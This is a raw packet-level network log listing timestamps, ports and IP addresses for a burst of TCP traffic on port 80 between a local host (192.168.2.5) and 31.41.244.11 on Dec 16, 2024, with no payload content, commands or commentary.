Dec 16, 2024 11:03:19.388437986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.388442039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.388490915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.389516115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.389653921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.389708996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.390686989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.390741110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.390815973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.390861988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.391834974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.391887903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.391953945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.392003059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.393013000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.393065929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.393116951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.393163919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.394139051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.394193888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.394258976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.394310951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.395292997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.395405054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.395462036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.395512104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.396487951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.396538019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.396543980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.396594048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.397595882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.397721052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.397772074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.398756027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.398807049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.398854971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.398905993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.399908066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.399957895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.400096893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.400147915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.401098967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.401245117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.401293993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.402254105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.402304888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.402370930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.402420044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.403372049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.403424025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.403496981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.403547049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.404545069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.404596090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.404670000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.404721022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.405729055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.405781984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.405848026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.405894995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.406842947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.406899929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.406981945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.407032967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.408013105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.408066988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.408128023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.408179045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.409164906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.409221888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.409276009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.409327030 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.410306931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.410356998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.410361052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.410412073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.411653042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.411703110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.411777973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.411828995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.412681103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.412730932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.548445940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.548510075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.548520088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.548559904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.548563004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.548599005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.548604012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.548643112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.549858093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.549915075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.549916029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.549954891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.551086903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.551126003 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.551137924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.551168919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.551932096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.551970005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.552026987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.552973986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.553035021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.553234100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.554311991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.554347992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.554375887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.554414034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.555474043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.555543900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.555752039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.555800915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.556458950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.556510925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.556514978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.556556940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.557590008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.557646036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.557653904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.557689905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.558813095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.558847904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.558900118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.560055971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.560115099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.560451984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.560518026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.561062098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.561116934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.561197042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.561433077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.562243938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.562295914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.562311888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.562773943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.563393116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.563538074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.563565969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.563591957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.564620972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.564640999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.564691067 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.565716982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.565767050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.565898895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.565939903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.566806078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.567012072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.567054033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.567998886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.568123102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.568177938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.569191933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.569210052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.569233894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.569247007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.570254087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.570314884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.570406914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.570570946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.571443081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.571499109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.571499109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.571538925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.572742939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.572760105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.572796106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.572810888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.573770046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.573821068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.573826075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.573864937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.574951887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.575004101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.575057983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.575336933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.576098919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.576153040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.576257944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.576303959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.577312946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.577397108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.577455044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.578375101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.578392029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.578433037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.578447104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.579504967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.579555035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.579603910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.579648018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.580710888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.580790997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.580902100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.580959082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.581898928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.581916094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.581954002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.581969023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.582947969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.583000898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.583087921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.583133936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.584168911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.584443092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.584628105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.584675074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.585427046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.585443974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.585474968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.585504055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.586545944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.586563110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.586612940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.586627007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.587747097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.587764978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.587796926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.587812901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.588865995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.588882923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.588923931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.588937044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.590043068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.590059996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.590096951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.590110064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.591162920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.591181040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.591212988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.591229916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.592160940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.592223883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.592328072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.592386007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.593364954 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.593422890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.593558073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.593673944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.594479084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.594521999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.594564915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.594772100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.595727921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.595771074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.595963001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.596009016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.596860886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.596916914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.596945047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.596985102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.598009109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.598099947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.598145008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.598259926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.599174976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.599230051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.599277020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.599494934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.600301027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.600361109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.600370884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.600413084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.601459980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.601504087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.601563931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.601608038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.602792978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.602811098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.602854013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.602886915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.603781939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.603909016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.603954077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.604923010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.604988098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.604993105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.605031967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.606210947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.606271982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.606290102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.606419086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.607204914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.607263088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.607266903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.607302904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.608360052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.608439922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.739929914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.740077972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.740144968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.740535021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.740586042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.740600109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.740634918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.741430998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.741492033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.741545916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.742544889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.742599964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.742660999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.742712021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.743783951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.743820906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.743837118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.743868113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.744961977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.745012999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.745111942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.745162010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.746063948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.746196032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.746248960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.747201920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.747256041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.747335911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.747383118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.748366117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.748426914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.748605013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.748652935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.749535084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.749648094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.749707937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.750772953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.750809908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.750828028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.750869036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.751825094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.751924992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.752058983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.752109051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.753051996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.753103971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.753170013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.753227949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.754254103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.754290104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.754340887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.755347967 CET	80	49800	31.41.244.11	192.168.2.5
